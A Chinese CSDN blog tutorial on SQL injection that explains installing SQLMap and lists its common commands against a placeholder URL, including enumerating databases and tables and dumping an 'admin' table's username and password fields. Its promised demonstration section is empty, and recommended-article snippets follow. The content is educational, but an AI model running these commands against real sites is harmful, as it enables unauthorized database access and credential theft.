网络安全博客3-sql注入

最新推荐文章于 2024-05-13 06:47:29 发布
最新推荐文章于 2024-05-13 06:47:29 发布
阅读量133 收藏
点赞数
分类专栏: 笔记 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42566183/article/details/104156270
版权

文章目录

1.准备

  1. 工具:SQLMap(需在python环境中运行)

  2. 环境:windows+python

  3. 安装python
        官网https://www.python.org/ 选择最新版本下载安装即可
        因为SQLMap使用Python写的 ,所以没有Python的环境SQLMap无法运行
    sqlmap 的运行环境目前只支持2.x版本

  4. 安装SQLMap

官网 http://sqlmap.org/ 选择最近版本安装即可
    安装SQLMap

官网 http://sqlmap.org/ 选择最近版本安装即可

  1. 设置环境变量

为了使用便利,将SQLMAP的安装目录添加到系统环境变量path中

之后在CMD中就可以直接使用SQLMap了

不设置环境变量的话,要把CMD的当前目录切换到SQLMap安装目录才可以使用

2.SQLMap常用命令介绍

  1. sqlmap.py -u “http://www.XXX.com/index.asp?id=1”
    判断id参数是否存在注入:结果中包含 “id” is Vulnerable 字段表示存在注入
    存在注入,下面的步骤才可以执行成功

  2. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” --dbs
        列举能列出的所有数据库名

  3. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” --current-db
        列出当前使用的数据库名,假设列出“sqltest”数据库

  4. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” --is-dba
        判断该注入点是否有管理员权限:返回true 表示是管理员

  5. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” -D “sqltest” --tables
        获取sqltest中的所有表,假设有"admin"表

  6. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” -D “sqltest” -T “admin” --columns
      列举表admin的字段(列名),假设存在"username","password"字段

  7. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” -D “sqltest” -T “admin” -C “username,password” --dump
     下载字段username,password的值,若询问是否破解md5加密,选择no即可

至此,对一个简单的注入点(GET方式),现在就已经得到了我们想要的数据
 
    想看工具的注入过程 使用-v参数
    -level 会提高注入等级(默认0 只会判断get,post参数是否有注入点)
    若注入点是POST方式,或是注入点是Cookie,User-Agent中,可以利用-Date 参数 -Cookie参数指定
    当然用buip Suite架个代理,截取数据包,直接 -r 参数引入数据包也可以完成上述的注入情况的~

3.实例演示
苦逼的人生需要吃点糖
关注
专栏目录
依赖注入的很好的一个博客例子
技术斋
01-14 1309
http://www.cnblogs.com/leoo2sk/archive/2009/06/17/1504693.html
SQL注入(别人的写的不错啊)
yangjingyuan的专栏
03-06 704
最常用的SQL注入攻击,就是绕过用户的身份验证。    先看看一个用户身份验证的代码吧,假设页面为login.aspx。        string strName = Request["name"].ToString();        string strPSD = Request["password"].ToString();        string strSQL = "select * from tbUser where name='" + strName + "'and password='"
注入方式
zhouzhou_98的博客
12-01 3038
    简单注入 复合注入 集合注入 具体文件格式 applicationContext.xml <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns = "http://www.springframework.org/schema/beans" xmlns:xsi = "h...
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
SQL注入实战第一个flag!
qq_41904330的博客
08-04 6168
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
网络安全笔记--SQL注入
swy66的博客
08-12 7163
SQL注入
网络安全--SQL注入sleep注入
weixin_43774199的博客
09-24 4076
课程目标:说明MySQL中sleep()、substr()、count()、length()等函数的用法,讲解盲注和ASCII码,组织实验使学生掌握sleep的注入方式。 任务目标:学会MySQL中sleep()、substr()、count()、length()等函数的用法,了解盲注和ASCII码,掌握sleep的注入方式。 A.MySQL中的sleep函数 MySQL中的sleep函数 在MySQL中执行select sleep(N)可以让此语句运行N秒钟,例如下图所示: Sleep函数.
网络安全--SQL注入介绍
weixin_43774199的博客
09-15 8188
课程目标:讲解SQL注入的原理、特点、危害,SQL注入的攻击手法和MySQL注入的常用函数,讲解相关工具,如何去防御SQL注入。 任务目标:了解SQL注入相关概念,掌握SQL注入攻击手法,了解SQL注入相关工具和防御方法。 A.SQL注入概述 什么是SQL注入 所谓SQL注入,就是通过SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入
网络安全-sql注入-sqlmap
09-02
网络安全-sql注入-sqlmap
网络安全-sql注入实战-sql-labs(1~10)
最新发布
09-02
网络安全-sql注入实战-sql-labs(1~10)
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
SQL注入是一种常见的网络安全威胁,它利用了不安全的Web应用程序中的设计缺陷,使得攻击者能够通过构造特定的SQL语句来操纵或访问数据库。在实验六中,我们将深入理解并实践这种攻击方式,以提高对网络安全的认识。 ...
网络安全---SQL注入攻击
zdsxc_的博客
04-05 1295
容器通常是一次性的,因此一旦被销毁,容器内的所有数据都会丢失。对于此次实验,我们确实希望将数据保留在 MySQL 数据库中,确保我们在关闭容器时,我们不会丢失工作。为此,我们将主机上的mysql_data文件夹(在 MySQL 容器运行后,在Labsetup文件夹内创建)装载(mounted)到MySQL容器内的 /var/lib/mysql 文件夹中。mysql_data文件夹是 MySQL 存储其数据库的地方。因此,即使容器被销毁,数据库中的数据仍保留。
网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4840
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
各种注入总结
ANYOUZHEN的博客
10-30 232
注入就是格式化字符串漏洞的一种体现 例如我们在原本正常数据中进行了sql注入,破坏了原来的sql语句,从而执行了与原来语句不同的指令,达到攻击者的目的 模板注入 SSTI(服务器端模板注入)是格式化字符串的一个非常好的例子 SSTI的产生: 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题. 补充: 单纯的字符串拼接并不能带来
常用dos基本命令整理
weixin_42566183的博客
02-13 2543
文章目录常用DOS命令整理一、DOS内部命令 常用DOS命令整理 一、DOS内部命令 目录切换命令:cd cd \ 返回到当前分区根目录 cd … 返回上一级目录 E: 进入E分区的根目录 创建目录命令:md(make directory) 功能:创建一个子目录 说明:可以直接创建多组命令 md AA BB Md XX\YY\ZZ **删除目录命令:rd ** rd 目录名 删除空...
黑客常用dos命令整理
weixin_42566183的博客
02-13 2322
文章目录黑客必备DOS命令整理**1.DIR命令**2.Ping(因特网包探索器)命令3.nbtstat命令4.netstat命令5.net命令6.PATH路径设置命令7.tree显示磁盘目录结构8.FTP命令大全 黑客必备DOS命令整理 1.DIR命令 作用:显示磁盘目录所包含的内容 格式:DIR[文件名][选项] 例如: DIR D:\JDK 查询D盘下的JDK文件夹下的未隐藏文件 DIR ...
系统安全博客3-windowsserver安全加固
weixin_42566183的博客
02-03 609
文章目录1.补丁管理2.账号口令3.授权4.系统安全设置5.网络服务6.文件系统7.日志审计 1.补丁管理 1.1安装补丁 操作目的 安装系统补丁,修补漏洞 检查方法 使用腾讯电脑管家企业版安装系统补丁,修补漏洞 加固方法 不能连接外网的内网主机手动安装补丁或在内网搭建WSUS服务器,外网主机使用腾讯电脑管家企业版安装系统补丁或设置自动更新从微软官方网站下载补丁安装 ...
网络安全博客1-ip地址的划分
weixin_42566183的博客
02-02 553
文章目录1.ip地址编址方案2.ip地址的分类2.1.A类地址2.2.B类地址2.3.C类地址2.4.D类地址范围:第一个字节为224--239,用作组播地址。2.5.E类地址范围:第一个字节为240--255,用于科学用途。3.保留ip4.子网划分4.1.A类网络子网划分4.2.B类网络子网划分4.3.C类网络子网划分4.CIDR值表 1.ip地址编址方案 ip地址编址分为ipv4以及ipv6,...
网络安全博客2-Apacheweb服务器安全加固
weixin_42566183的博客
02-03 353
文章目录1.账号设置2.授权设置3.日志设置4.监听端口设置 Apache服务器是比较流行的一款静态页面处理web服务器,在企业的日常开发与维护中,需要对web服务器进行安全加强,确保网站的安全稳定。 1.账号设置 以专门的用户帐号和组运行 Apache。 1、 根据需要为 Apache 创建用户、组 2、 参考配置操作 如果没有设置用户和组,则新建用户,并在 Apache 配置文件中指定 参考步...
理解SQL注入网络安全技术解析
"网络安全技术13SQL注入.pptx" 这篇资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值